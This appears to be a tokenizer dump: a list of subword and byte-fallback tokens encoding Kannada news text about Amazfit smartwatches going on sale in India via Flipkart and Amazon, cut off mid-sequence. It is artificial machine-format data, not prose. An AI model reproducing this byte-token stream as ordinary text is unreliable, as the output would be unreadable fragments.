'<0xA8>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAA>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9A>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', 'ರ', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '<0xE0>', '<0xB2>', '<0x9A>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '್', 'ರ', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x8E>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8A>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xA6>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAD>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA6>', '▁', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB3>', '<0x81>', 'ರ', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8A>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0x97>', '▁', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xAD>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9C>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8C>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '<0x0A>', '<0xE0>', '<0xB2>', '<0xB9>', '<0xE0>', '<0xB3>', '<0x8C>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x81>', ',', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xAA>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8C>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x81>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x96>', 'ರ', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0x89>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xAE>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x82>', '▁', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xAA>', '್', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA6>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x8E>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '▁', '2', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', ',', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '▁', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAA>', '್', 'ರ', '<0xE0>', '<0xB3>', '<0x8A>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB3>', '<0x86>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x98>', '<0xE0>', '<0xB3>', '<0x8B>', '<0xE0>', '<0xB2>', '<0xB7>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0xB9>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA6>', '್', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBE>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x8A>', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x8A>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0x88>', '▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0x96>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8A>', '<0xE0>', '<0xB2>', '<0xA1>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x93>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xBF>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '.', '<0x0A>', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB6>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAA>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0x97>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '್', 'ರ', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '್', '▁', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x87>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xB5>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '▁', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xA7>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x83>', '<0xE0>', '<0xB2>', '<0xA4>', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xAC>', '್', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xB5>', '್', '▁', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x88>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x87>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xAC>', 'ರ', '್', '▁', '1', '2', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xB5>', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x8E>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '▁', '2', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '<0xE0>', 